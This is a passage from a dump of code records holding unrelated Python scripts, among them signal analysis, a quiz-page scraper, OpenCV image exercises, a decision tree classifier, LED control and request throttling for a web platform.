postLimUp)\npreSignal, postSignal = find_prepost_values(windowTimeVec, windowed_signal, -0.5, 0, 1.4, 2.0)\naveragePreSignal = preSignal.mean(axis = 0)\naveragePostSignal = postSignal.mean(axis = 0)\ndataToPlot = [averagePreSignal, 
averagePostSignal]\nxlabels = ['Pre signal', 'Post signal']\n\n#--- Wilcoxon test to obtain statistics ---\nwstat, pval = stats.wilcoxon(averagePreSignal, averagePostSignal)\nprint('Wilcoxon value config14_1', wstat,',', 'P-value config14_1', pval)\n\n#--- Defining the correct time range for pupil's relaxation (dilation) --- DB: SEEMS TO BE FOR PLOTTING, MAYBE WE SHOULD RENAME.\ntimeRangeForPupilDilation = np.array([-12, 12])\n#def eventlocked_signal(timeVec, signal, eventOnsetTimes, windowTimeRange)\npupilDilationTimeWindowVec, pAreaDilated = eventlocked_signal(timeVec, pArea, timeOfSyncOnset, timeRangeForPupilDilation)\npAreaDilatedMean = pAreaDilated.mean(axis = 1)\n\n#--- Plotting the results ---\nOverLapPlots = comparison_plot(pupilDilationTimeWindowVec, pAreaDilatedMean, pval)\nscattBar = barScat_plots(averagePreSignal, averagePostSignal, 'pre stimulus onset', 'post stimulus onset', preSignal, postSignal, pval)\n\n#--- Finding and plotting pupil area corresponding to each tested frequency ---\n#freqValues1, freqValues2, freqValues3, freqValues4, freqValues5 = freqs_and_meanParea(freqs, averagePostSignal, 2000, 4000, 8000, 16000, 32000) \n#pAreaFreqPlot = PDR_kHz_plot(frequenciesTested, freqValues1, freqValues2, freqValues3, freqValues4, freqValues5)\n\nprint('Data averaged over ', pAreaDilated.shape[1], ' trials')\n\n\n\n\n","sub_path":"dannybrown/interim/comparison1Plot_DBcompleted.py","file_name":"comparison1Plot_DBcompleted.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"91935238","text":"# Write a program that computes the net amount of a bank account based on a transaction log from console input.\n# The transaction log format is shown as following:\n# D 100 (D --> deposit)\n# W 200 (W --> withdrawal)\n\n# Input :\n# D 300\n# D 300\n# W 200\n# D 100\n# Output : 500\n\ndepo = withd = 0\nwhile True:\n\tdata = input()\n\tif not data:\n\t\tbreak\n\tv = data.split(' ')\n\tfor i in range(len(v)):\n\t\t# compare with ==, not 'is': string identity is an implementation detail\n\t\tif v[i] == 'D':\n\t\t\tdepo += int(v[i+1])\n\t\telif v[i] == 'W':\n\t\t\twithd += int(v[i+1])\nprint(depo-withd)\n\t","sub_path":"100_17_bank.py","file_name":"100_17_bank.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"480451370","text":"\r\nimport pandas as pd\r\n\r\ndef load_masterdictionary(file_path, stopwords_file, print_flag=False, f_log=None, get_other=False):\r\n    _master_dictionary = {}\r\n    _sentiment_categories = ['negative', 'positive', 'uncertainty', 'litigious', 'constraining',\r\n                             'strong_modal', 'moderate_modal','weak_modal']\r\n\r\n\r\n    _stopwords = pd.read_csv(stopwords_file, header=None)\r\n\r\n    _stopwords = [val.lower() for sublist in _stopwords.values for val in sublist]\r\n\r\n    #_stopwords = [word.lower() for word in _stopwords]\r\n\r\n\r\n    with open(file_path) as f:\r\n        _total_documents = 0\r\n        _md_header = f.readline()\r\n        for line in f:\r\n            cols = line.split(',')\r\n\r\n            _master_dictionary[cols[0].lower()] = MasterDictionary(cols, _stopwords)\r\n            _total_documents += _master_dictionary[cols[0].lower()].doc_count\r\n            if len(_master_dictionary) % 5000 == 0 and print_flag:\r\n                print('\\r ...Loading Master Dictionary' + ' {}'.format(len(_master_dictionary)), end='', flush=True)\r\n\r\n    if print_flag:\r\n        print('\\r', end='') # clear line\r\n        print('\\nMaster Dictionary loaded from file: \\n ' + file_path)\r\n        print(' {0:,} words loaded in 
master_dictionary.'.format(len(_master_dictionary)) + '\\n')\r\n\r\n\r\n if f_log:\r\n try:\r\n f_log.write('\\n\\n load_masterdictionary log:')\r\n f_log.write('\\n Master Dictionary loaded from file: \\n ' + file_path)\r\n f_log.write('\\n {0:,} words loaded in master_dictionary.\\n'.format(len(_master_dictionary)))\r\n except Exception as e:\r\n print('Log file in load_masterdictionary is not available for writing')\r\n print('Error = {0}'.format(e))\r\n\r\n if get_other:\r\n return _master_dictionary, _md_header, _sentiment_categories, _stopwords\r\n else:\r\n return _master_dictionary\r\n\r\n\r\ndef create_sentimentdictionaries(_master_dictionary, _sentiment_categories, negation_list=None):\r\n\r\n _sentiment_dictionary = {}\r\n for category in _sentiment_categories:\r\n _sentiment_dictionary[category] = {}\r\n # Create dictionary of sentiment dictionaries with count set = 0\r\n for word in _master_dictionary.keys():\r\n for category in _sentiment_categories:\r\n if _master_dictionary[word].sentiment[category]:\r\n _sentiment_dictionary[category][word] = 0\r\n\r\n if negation_list is not None:\r\n _sentiment_dictionary['negation'] = {}\r\n\r\n for word in negation_list:\r\n _sentiment_dictionary['negation'][word] = 0\r\n\r\n return _sentiment_dictionary\r\n\r\n\r\nclass MasterDictionary:\r\n def __init__(self, cols, _stopwords):\r\n self.word = cols[0].lower()\r\n self.sequence_number = int(cols[1])\r\n self.word_count = int(cols[2])\r\n self.word_proportion = float(cols[3])\r\n self.average_proportion = float(cols[4])\r\n self.std_dev_prop = float(cols[5])\r\n self.doc_count = int(cols[6])\r\n self.negative = int(cols[7])\r\n self.positive = int(cols[8])\r\n self.uncertainty = int(cols[9])\r\n self.litigious = int(cols[10])\r\n self.constraining = int(cols[11])\r\n self.superfluous = int(cols[12])\r\n self.interesting = int(cols[13])\r\n self.modal_number = int(cols[14])\r\n self.strong_modal = False\r\n if int(cols[14]) == 1:\r\n self.strong_modal = True\r\n self.moderate_modal = False\r\n if int(cols[14]) == 2:\r\n self.moderate_modal = True\r\n self.weak_modal = False\r\n if int(cols[14]) == 3:\r\n self.weak_modal = True\r\n self.sentiment = {}\r\n self.sentiment['negative'] = bool(self.negative)\r\n self.sentiment['positive'] = bool(self.positive)\r\n self.sentiment['uncertainty'] = bool(self.uncertainty)\r\n self.sentiment['litigious'] = bool(self.litigious)\r\n self.sentiment['constraining'] = bool(self.constraining)\r\n self.sentiment['strong_modal'] = bool(self.strong_modal)\r\n self.sentiment['moderate_modal'] = bool(self.moderate_modal)\r\n self.sentiment['weak_modal'] = bool(self.weak_modal)\r\n self.irregular_verb = int(cols[15])\r\n self.harvard_iv = int(cols[16])\r\n self.syllables = int(cols[17])\r\n self.source = cols[18]\r\n\r\n if self.word in _stopwords:\r\n self.stopword = True\r\n else:\r\n self.stopword = False\r\n return\r\n","sub_path":"load_MasterDictionary.py","file_name":"load_MasterDictionary.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190605724","text":"import tkinter\n\n\ndef parabola(par_x):\n return list(map(lambda x: (x ** 2) / 100, par_x))\n\n\ndef draw_axes(par_canvas):\n par_canvas.update()\n x_origin = par_canvas.winfo_width() / 2\n y_origin = par_canvas.winfo_height() / 2\n par_canvas.configure(scrollregion=(-x_origin, -y_origin, x_origin, y_origin))\n par_canvas.create_line(-x_origin, 0, x_origin, 0, fill=\"black\")\n 
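    # the line above drew the horizontal x-axis; next comes the vertical y-axis through the origin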
par_canvas.create_line(0, -y_origin, 0, y_origin, fill=\"black\")\n\n\ndef draw_parabola(par_canvas):\n par_canvas.update()\n xes = range(-320, 320, 1)\n # ratio = parCanvas.winfo_width() / 100\n ratio = 1\n ratio2 = 100 / par_canvas.winfo_height()\n print(ratio)\n for i in range(len(xes) - 1):\n par_canvas.create_line(xes[i] * ratio, ratio2 * parabola(xes[i] * ratio), xes[i + 1] * ratio,\n ratio2 * parabola(xes[i + 1] * ratio), fill=\"black\")\n\n\ndef plot(par_canvas, par_x, par_y):\n par_canvas.update()\n for i in range(len(par_x) - 1):\n par_canvas.create_line(par_x[i], -par_y[i], par_x[i + 1],\n -par_y[i + 1], fill=\"black\")\n\n\nmainWindow = tkinter.Tk()\nmainWindow.title(\"Parabola\")\nmainWindow.geometry(\"640x480\")\n\ncanvas = tkinter.Canvas(mainWindow, width=320, height=480)\ncanvas.grid(row=0, column=0)\ncanvas2 = tkinter.Canvas(mainWindow, width=320, height=480)\ncanvas2.grid(row=0, column=1)\nprint(repr(canvas), repr(canvas2))\ndraw_axes(canvas)\ndraw_axes(canvas2)\nX = list(range(-100, 100, 1))\nprint(X)\nY = parabola(X)\nprint(Y)\nplot(canvas, X, Y)\n\nmainWindow.mainloop()\n","sub_path":"Section_11/95_lecture.py","file_name":"95_lecture.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414715207","text":"import pandas as pd\r\nimport requests\r\nfrom lxml import html\r\nfrom pandas import ExcelWriter\r\nimport numpy as np\r\n\r\ndf = pd.DataFrame(columns=['Question','Answer'])\r\n# print (df)\r\n\r\nhp_link = \"https://www.gktoday.in/general-knowledge/\"\r\n\r\npage = requests.get(hp_link)\r\ndoc = html.fromstring(page.content)\r\n\r\nsections = np.array([])\r\n# topics = np.array([])\r\nfor i in range(1,20):\r\n try:\r\n x_path = '/html/body/div[1]/div[2]/div/aside/div[2]/ul/li[' + str(i) + ']/a'\r\n section = doc.xpath(x_path)[0].get(\"href\")\r\n sections = np.append(sections, section)\r\n # topics = np.append(topics, section.split('https://www.gktoday.in/quizbase/', 1)[-1])\r\n except (ValueError,IndexError):\r\n # print (i)\r\n continue\r\nsections = np.unique(sections)\r\n# print (sections)\r\n# print (topics)\r\n\r\n# section = sections[0]\r\n# print (section)\r\n\r\nindex = 0\r\nfor section in sections:\r\n page_link = section + '?pageno=1'\r\n page = requests.get(page_link)\r\n doc = html.fromstring(page.content)\r\n max_page = int(doc.xpath('/html/body/div[1]/div[2]/div/div/div[2]/article/div/ul/li[1]')[0].text_content().split('Page 1 of ', 1)[-1])\r\n # print (max_page)\r\n for page_no in range(1, max_page+1):\r\n page_link = section + '?pageno=' + str(page_no)\r\n # print (page_link)\r\n page = requests.get(page_link)\r\n doc = html.fromstring(page.content)\r\n for i in range(1,11):\r\n try:\r\n ques_x_path = '/html/body/div[1]/div[2]/div/div/div[2]/article/div/div[' + str(i) + ']/div[1]/p'\r\n ans_x_path = '/html/body/div[1]/div[2]/div/div/div[2]/article/div/div[' + str(i) + ']/div[3]/div[1]'\r\n ques = doc.xpath(ques_x_path)[0].text_content()\r\n ans = doc.xpath(ans_x_path)[0].text_content().split('[', 1)[-1].split(']', 1)[0]\r\n df.loc[index] = [ques, ans]\r\n index += 1\r\n except (ValueError,IndexError):\r\n # print (i)\r\n break\r\n print (section, page_no, max_page)\r\n\r\nwriter = ExcelWriter('gkques.xlsx')\r\ndf.to_excel(writer,'qna')\r\nwriter.save()\r\n\r\nprint 
(\"done\")","sub_path":"gktoday-gk-leecher.py","file_name":"gktoday-gk-leecher.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"394249379","text":"# -*- coding: utf-8 -*-\nimport queue\nimport random\n\nif __name__ == \"__main__\":\n q = queue.PriorityQueue()\n \n data = random.sample(range(1, 100), 5)\n print(\"Orignal data:\", data)\n \n for i in data:\n q.put(i)\n \n print(\"Priority queue:\")\n while not q.empty():\n print(q.get(), end=' ')\n print()","sub_path":"standard/010.queue/priority_queue.py","file_name":"priority_queue.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"65803651","text":"import neopixel\nimport board\nfrom random import randrange\nfrom time import sleep\n\n# definitions of functions\ndef rgb_to_grb_and_brightness(rgb, userbrightness):\n r, g, b = rgb\n ledpower = r * g * b # 255 255 255 would be 16,581,375\n\n if ledpower >= 3375000: # this is 150 150 150\n brightness = 0.3 * userbrightness\n else:\n brightness = 0.6 * userbrightness\n\n return (int(g * brightness), int(r * brightness), int(b * brightness))\n\nsettings_file = open(\"settings.txt\", \"rt\")\n\nbrightness_value_ = settings_file.readline()\nbrightness_value_ = brightness_value_.replace(\"brightness = \", \"\")\nbrightness_value_ = brightness_value_.replace(\"\\n\", \"\")\nbrightness_value = float(brightness_value_)\nbrightness_value = brightness_value / 100\n\ncolor1_ = settings_file.readline()\ncolor2_ = settings_file.readline()\ncolor3_ = settings_file.readline()\n\ncolor1_ = color1_.replace(\"color1 = \", \"\")\ncolor1_ = color1_.replace(\"\\n\", \"\")\ncolor2_ = color2_.replace(\"color2 = \", \"\")\ncolor2_ = color2_.replace(\"\\n\", \"\")\ncolor3_ = color3_.replace(\"color3 = \", \"\")\ncolor3_ = color3_.replace(\"\\n\", \"\")\n\ncolor1 = int(color1_)\ncolor2 = int(color2_)\ncolor3 = int(color3_)\n\ncolor_value = (color1, color2, color3)\n\nmode_ = settings_file.readline()\nmode_ = mode_.replace(\"mode = \", \"\")\nmode_ = mode_.replace(\"\\n\", \"\")\nmode = mode_\n\ndelay_ = settings_file.readline()\ndelay_ = delay_.replace(\"delayrainbow = \", \"\")\ndelay_ = delay_.replace(\"\\n\", \"\")\ndelay = int(delay_)\n\nprint(color_value)\nprint(brightness_value)\nprint(mode)\nprint(delay)\n\nboardleds = neopixel.NeoPixel(board.D4, 117)\n\nfor x in range(0, 10):\n if mode == \"rainbow\":\n while True:\n for pixel in range(0, 117):\n boardleds[pixel] = (int(randrange(0, 255) * brightness_value), int(randrange(0, 255) * brightness_value), int(randrange(0, 255) * brightness_value))\n sleep(float(delay)/1000)\n elif mode == \"setcolor\":\n while True:\n for pixel in range(0, 117):\n boardleds[pixel] = rgb_to_grb_and_brightness(color_value, brightness_value)\n else:\n mode = \"rainbow\"\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"368226418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#  @Time    : 2021/3/13 10:32\n#  @Author  : Wowspring\n#  @Site    :\n#  @File    : BackgroundReplace.py\n#  @Software: PyCharm\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimage = mpimg.imread(\"../img/certificate.jpg\")\nimage = np.copy(image)\nprint('this image is:', type(image), 'with dimensions:', 
image.shape)\n\ngray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\nplt.imshow(gray_image, cmap='gray')\nplt.show()\nlower_gray = np.array(235)\nupper_gray = np.array(255)\n\nmask = cv2.inRange(gray_image, lower_gray, upper_gray)\nplt.imshow(mask, cmap='gray')\nplt.show()\n\n# 腐蚀膨胀\nerode = cv2.erode(mask, None, iterations=1)\n# plt.imshow(erode)\n# plt.show()\ndilate = cv2.dilate(erode, None, iterations=1)\n# plt.imshow(dilate)\n# plt.show()\nmasked_img = np.copy(image)\nmasked_img[dilate != 0] = [0, 0, 0]\nplt.imshow(masked_img)\nplt.show()\n\n# Background img\nbackground_image = mpimg.imread('../img/sky2.jpeg')\ncrop_background_image = background_image[0:masked_img.shape[0], 0:masked_img.shape[1]]\nplt.imshow(crop_background_image)\nprint('Image dimensions:', crop_background_image.shape)\nplt.show()\n\ncrop_background = np.copy(crop_background_image)\ncrop_background[dilate == 0] = [0, 0, 0]\nplt.imshow(crop_background)\nplt.show()\n\nprint('Masked Image dimensions:', masked_img.shape)\nprint('background Image dimensions:', crop_background.shape)\n\ncomplete_image = masked_img + crop_background\nplt.imshow(complete_image)\nplt.show()\n\nmpimg.imsave('../img/certificateandsky.jpg', complete_image)\n","sub_path":"120181080223-姚鹏飞-作业2/src/BackgroundReplace.py","file_name":"BackgroundReplace.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"91176995","text":"import math, csv, operator, json\nfrom collections import defaultdict\nfrom random import shuffle\n\n### For splitting the continuous variables #################\ndef mean(data):\n return sum(x for x in data)/float(len(data))\n\ndef variance(data):\n m = mean(data)\n return sum((x-m)**2 for x in data)/float(len(data))\n\ndef sigma(data):\n return math.sqrt(variance(data))\n############################################\n \nclass Node:\n \"\"\" Data container for each node of the decision tree. Implements methods for computing entropy and information gain, as well as splitting the data. \"\"\"\n def __init__(self, data, attr=None, attr_value=None, parent=None):\n self.data = data\n self.attr = attr\n self.attr_value = attr_value\n #self.prev_split_idx = prev_split_idx\n self.parent = parent\n self.entropy = self.get_entropy()\n self.best_split_idx, self.best_split_gain = self.best_split()[0], self.best_split()[1]\n \n def get_entropy(self, attr=None):\n \"\"\" Computes the entropy of the entire node when attr=None or of the node created by selecting for attr. See split_data() for explanation of how continuous variables are handled. 
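Continuous attributes are scored against an interval of mean +/- sigma ('under', 'within', 'over').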
\"\"\"\n if attr:\n if len(attr) == 3:\n m = attr[2][0]\n s = attr[2][1]\n i = attr[0]\n attr = attr[1]\n counts = defaultdict(float)\n for row in self.data:\n if attr and attr not in ['under', 'over', 'within']:\n if row[i] == attr:\n counts[row[-1]] += 1 # row[-1] is the classification label or the training instance\n elif attr == 'under':\n if row[i] < m-s:\n counts[row[-1]] += 1\n elif attr == 'over':\n if row[i] > m+s:\n counts[row[-1]] += 1\n elif attr == 'within':\n if row[i] <= m+s and row[i] >= m-s:\n counts[row[-1]] += 1\n else:\n counts[row[-1]] += 1\n \n return -sum(count/sum(counts.values())*math.log(count/sum(counts.values()), 2) for count in counts.itervalues())\n \n def information_gain(self, field_index, c=None):\n \"\"\" Computes the information gain associated with splitting on field_index \"\"\"\n current_entropy = self.get_entropy()\n counts = defaultdict(float)\n if not c:\n for row in self.data:\n counts[row[field_index]] += 1\n else:\n m = c[0]\n s = c[1]\n for row in self.data:\n if row[field_index] < m-s:\n counts['under'] += 1\n elif row[field_index] > m+s:\n counts['over'] += 1\n else:\n counts['within'] += 1\n if not c:\n split_entropy = sum(count/sum(counts.values())*self.get_entropy((field_index, key)) for key, count in counts.iteritems())\n else:\n split_entropy = sum(count/sum(counts.values())*self.get_entropy((field_index, key, c)) for key, count in counts.iteritems())\n \n return current_entropy - split_entropy \n \n def best_split(self):\n \"\"\" Returns (index, information_gain) for the field that generates the highest information gain. \"\"\"\n gains = defaultdict(float)\n for i in range(0, len(self.data[0])-1):\n if type(self.data[0][i]) == str:\n gains[i] = self.information_gain(i)\n else:\n attrs = [row[i] for row in self.data]\n gains[i] = self.information_gain(i, (mean(attrs), sigma(attrs)) )\n return max(gains.iteritems(), key=operator.itemgetter(1)) \n \n def split_data(self):\n \"\"\" Splits the data on self.best_split_idx, which is the index returned by best_split(). Continuous variables are split into 3 bins: values under, within, or over a 2*sigma-wide interval centered on the mean of all values in the list self.data[self.best_split_idx]. \"\"\"\n best = self.best_split_idx\n new_data = defaultdict(list)\n if type(self.data[0][best]) == str:\n c = 'str'\n for row in self.data:\n new_data[row[best]].append(row)\n else:\n attrs = [row[best] for row in self.data]\n m = mean(attrs)\n s = sigma(attrs)\n c = (m, s)\n for row in self.data:\n if row[best] > m+s:\n new_data['over'].append(row)\n elif row[best] < m-s:\n new_data['under'].append(row)\n else:\n new_data['within'].append(row)\n return (new_data, c)\n \n def get_class_counts(self):\n \"\"\" Return the number of instances in each class within the node. \"\"\"\n counts = defaultdict(float)\n for row in self.data:\n counts[row[-1]] += 1\n return counts\n \ndef Tree(node, attr='root'):\n \"\"\" Builds the decision tree using Node class as a data container. \"\"\"\n name = attr\n node_info = {'name': name, 'parent': node.parent, 'node': node}\n \n children = []\n entropy = node.entropy\n if entropy < 0.45 or len(node.data) < 80: # Stop splitting. Values found via parameter sweep.\n node_info['leaf'] = True\n label = max(node.get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n node_info['children'] = label \n return node_info\n else: # Split node. 
\n node_info['children'] = defaultdict(Tree)\n node_info['leaf'] = False\n best = node.best_split_idx\n split_attr = node.split_data()\n split_attr, c = split_attr[0], split_attr[1]\n node_info['split_on'] = best\n if type(c) == str:\n node_info['split_mean'] = c\n else:\n node_info['split_mean'] = c[0]\n node_info['split_sigma'] = c[1]\n for key, data in split_attr.items():\n node_info['children'][key] = Tree(Node(data, best, key, name), key)\n return node_info\n \ndef classify(tree, instance):\n \"\"\" Recursively traverses tree along a path determined by instance attributes until a leaf is found. The value of tree['children'] is the class label. If a path does not match the instance attribute, max(count(class)) of all data in the current node of the tree is the prediction. \"\"\"\n if tree.get('leaf'):\n return tree.get('children')\n else:\n ind = tree.get('split_on')\n val = instance[ind]\n if type(val) == str:\n if val in tree.get('children').keys():\n next_node = tree.get('children').get(val)\n else:\n return max(tree.get('node').get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n else:\n m = tree.get('split_mean')\n s = tree.get('split_sigma')\n if val > m+s:\n next_node = tree.get('children').get('over')\n elif val < m-s:\n next_node = tree.get('children').get('under')\n else:\n next_node = tree.get('children').get('within')\n if next_node==None:\n return max(tree.get('node').get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n else:\n predict = classify(next_node, instance)\n return predict\n \n \ndef jsonTree(tree):\n \"\"\" Build a structure to output into a JSON file for debugging the algorithm \"\"\"\n node = {'name': tree['name'], 'parent': tree['parent']}\n children = tree['children']\n node['children'] = list()\n if type(children) is str:\n node['children'].append({'name': children})\n return node\n else:\n for child in children.itervalues():\n node['children'].append(jsonTree(child))\n return node\n \nif __name__ == \"__main__\":\n \n with open(\"hw4-task1-data.tsv\") as tsv:\n data = [list(line) for line in csv.reader(tsv, delimiter=\"\\t\")]\n \n int_ind = [0, 2, 4, 10, 11, 12]\n for row in data:\n for i, item in enumerate(row):\n if i in int_ind:\n row[i] = int(row[i])\n \n # Split training/test sets\n accuracy = []\n shuffle(data) # Mix it up\n K = 10\n chunk = len(data)/K\n for i in range(K):\n try:\n training_set = data[i*chunk:(i+1)*chunk]\n if i == 0:\n test_set = data[(i+1)*chunk:]\n elif i == 9:\n test_set = data[:len(data)-chunk]\n else:\n test_set = [item for sublist in [data[:i*chunk], data[(i+1)*chunk:]] for item in sublist]\n \n print('training on fold # ' + str(i))\n tree = Tree(Node(training_set))\n print ('fold # ' +str(i) + ' trained!')\n \n results = []\n for instance in test_set:\n result = classify(tree, instance)\n results.append(result == instance[-1])\n \n accuracy.append(float(results.count(True))/float(len(results)))\n except RuntimeError:\n print ('Failure at fold ' +str(i)+'. 
Maximum recursion depth exceeded.')\n    print (\"Worst Accuracy:\\t %f\" % (min(accuracy)*100.0))\n    print (\"Best Accuracy:\\t %f\" % (max(accuracy)*100.0))\n    print (\"Avg Accuracy:\\t %f\" % (mean(accuracy)*100.0))\n    avg_accuracy = mean(accuracy) # average accuracy across test sets from each fold\n    \n    # Writing results to a file \n    f = open(\"result.txt\", \"w\")\n    f.write(\"accuracy: %.4f\" % avg_accuracy)\n    f.close()\n    \n    # json_data = jsonTree(tree)\n    \n    # with open('data.json', 'w') as outfile:\n    #     json.dump(json_data, outfile, sort_keys=True, indent=4, ensure_ascii=False)\n    ","sub_path":"dtree.py","file_name":"dtree.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17233648","text":"from datetime import timedelta\n\nfrom django.utils import timezone\nfrom django.core.mail import mail_managers\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom froide.helper.date_utils import format_seconds\n\n\ndef throttle(qs, throttle_config, date_param='first_message'):\n    if throttle_config is None:\n        return False\n\n    # Return True if the next request would break any limit\n    for count, seconds in throttle_config:\n        f = {\n            '%s__gte' % date_param: timezone.now() - timedelta(seconds=seconds)\n        }\n        if qs.filter(**f).count() + 1 > count:\n            return (count, seconds)\n    return False\n\n\ndef check_throttle(user, klass):\n    if user.is_authenticated and not user.trusted():\n        throttle_settings = settings.FROIDE_CONFIG.get('request_throttle', None)\n        qs, date_param = klass.objects.get_throttle_filter(user)\n        throttle_kind = throttle(qs, throttle_settings, date_param=date_param)\n        if throttle_kind:\n            mail_managers(_('User exceeded request limit'), user.pk)\n            return _('You exceeded your request limit of {count} requests in {time}.'\n                ).format(count=throttle_kind[0],\n                    time=format_seconds(throttle_kind[1])\n                )\n","sub_path":"froide/foirequest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38450087","text":"'''\nHere we will learn to extract some frequently used properties of objects like \nSolidity, Equivalent Diameter, Mask image, Mean Intensity etc. More features \ncan be found at Matlab regionprops documentation.\n\n*(NB : Centroid, Area, Perimeter etc also belong to this category, but we have \nseen it in last chapter)*\n1. Aspect Ratio\n\nIt is the ratio of width to height of bounding rect of the object.\n'''\n\n# Aspect Ratio = Width / Height\nx,y,w,h = cv.boundingRect(cnt)\naspect_ratio = float(w)/h\n'''\n\n2. Extent\n\nExtent is the ratio of contour area to bounding rectangle area.\n'''\n# Extent = Object Area / Bounding Rectangle Area\narea = cv.contourArea(cnt)\nx,y,w,h = cv.boundingRect(cnt)\nrect_area = w*h\nextent = float(area)/rect_area\n\n'''\n3. Solidity\n\nSolidity is the ratio of contour area to its convex hull area.\n'''\n# Solidity = Contour Area / Convex Hull Area\narea = cv.contourArea(cnt)\nhull = cv.convexHull(cnt)\nhull_area = cv.contourArea(hull)\nsolidity = float(area)/hull_area\n\n'''\n4. Equivalent Diameter\n\nEquivalent Diameter is the diameter of the circle whose area is same as the contour area.\n\n'''\n\narea = cv.contourArea(cnt)\nequi_diameter = np.sqrt(4*area/np.pi)\n\n'''\n5. Orientation\n\nOrientation is the angle at which object is directed. 
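(Editor's note, added: cv.fitEllipse requires a contour of at least five points, so guard smaller contours before calling it.)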
Following method also gives the Major Axis and Minor Axis lengths.\n'''\n\n(x,y),(MA,ma),angle = cv.fitEllipse(cnt)\n\n'''\n\n6. Mask and Pixel Points\n\nIn some cases, we may need all the points which comprise that object. It can be done as follows:\n'''\n \nmask = np.zeros(imgray.shape,np.uint8)\ncv.drawContours(mask,[cnt],0,255,-1)\npixelpoints = np.transpose(np.nonzero(mask))\n#pixelpoints = cv.findNonZero(mask)\n\n'''\nHere, two methods, one using Numpy functions, next one using OpenCV function (last commented line) are given to do the same. Results are also same, but with a slight difference. Numpy gives coordinates in **(row, column)** format, while OpenCV gives coordinates in **(x,y)** format. So basically the answers will be interchanged. Note that row = y and column = x.\n7. Maximum Value, Minimum Value and their locations\n\nWe can find these parameters using a mask image.\nmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(imgray,mask = mask)\n8. Mean Color or Mean Intensity\n\nHere, we can find the average color of an object. Or it can be average intensity of the object in grayscale mode. We again use the same mask to do it.\nmean_val = cv.mean(im,mask = mask)\n9. Extreme Points\n\nExtreme Points means topmost, bottommost, rightmost and leftmost points of the object.\n'''\n\nleftmost = tuple(cnt[cnt[:,:,0].argmin()][0])\nrightmost = tuple(cnt[cnt[:,:,0].argmax()][0])\ntopmost = tuple(cnt[cnt[:,:,1].argmin()][0])\nbottommost = tuple(cnt[cnt[:,:,1].argmax()][0])\n\n'''\nFor example, if I apply it to a Bangladesh map, I get the following result :\n''' ","sub_path":"4. ImageProcessing/10.3_Contour_Properties.py","file_name":"10.3_Contour_Properties.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"219064679","text":"import os\nimport sys\nimport tqdm\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom types import SimpleNamespace\nfrom src.envs import all_envs\nfrom src.utils.logger import Logger\nfrom src.data.loaders import RolloutSequenceDataset\nfrom src.models.pytorch import EnvModel\nfrom src.models import all_envmodels, all_models, get_config\n\nclass Trainer():\n\tdef __init__(self, config):\n\t\tself.dataset_train = RolloutSequenceDataset(config, train=True)\n\t\tself.dataset_test = RolloutSequenceDataset(config, train=False)\n\t\tself.train_loader = torch.utils.data.DataLoader(self.dataset_train, batch_size=config.batch_size, shuffle=True, num_workers=config.nworkers)\n\t\tself.test_loader = torch.utils.data.DataLoader(self.dataset_test, batch_size=config.batch_size, shuffle=False, num_workers=config.nworkers)\n\n\tdef train_loop(self, ep, envmodel, update=1):\n\t\tbatch_losses = []\n\t\tenvmodel.network.train()\n\t\twith tqdm.tqdm(total=len(self.dataset_train)) as pbar:\n\t\t\tpbar.set_description_str(f\"Train Ep: {ep}, \")\n\t\t\tfor i,(states, actions, next_states, rewards, dones) in enumerate(self.train_loader):\n\t\t\t\tloss = envmodel.network.optimize(states, actions, next_states, rewards, dones)\n\t\t\t\tif i%update == 0:\n\t\t\t\t\tpbar.set_postfix_str(f\"Loss: {loss:.4f}\")\n\t\t\t\t\tpbar.update(states.shape[0]*update)\n\t\t\t\tbatch_losses.append(loss)\n\t\treturn np.mean(batch_losses)\n\n\tdef test_loop(self, ep, envmodel):\n\t\tbatch_losses = []\n\t\tenvmodel.network.eval()\n\t\twith torch.no_grad():\n\t\t\tfor states, actions, next_states, rewards, dones in self.test_loader:\n\t\t\t\tloss = envmodel.network.get_loss(states, actions, next_states, rewards, dones).item()\n\t\t\t\tbatch_losses.append(loss)\n\t\treturn np.mean(batch_losses)\n\ndef train(make_env, config):\n\ttrainer = Trainer(config)\n\tenvmodel = EnvModel(config.state_size, config.action_size, config, load=\"\", gpu=True)\n\tcheckpoint = f\"{config.env_name}\"\n\tlogger = Logger(trainer, envmodel.network, config)\n\tep_train_losses = []\n\tep_test_losses = []\n\tfor ep in range(config.epochs):\n\t\ttrain_loss = trainer.train_loop(ep, envmodel)\n\t\ttest_loss = 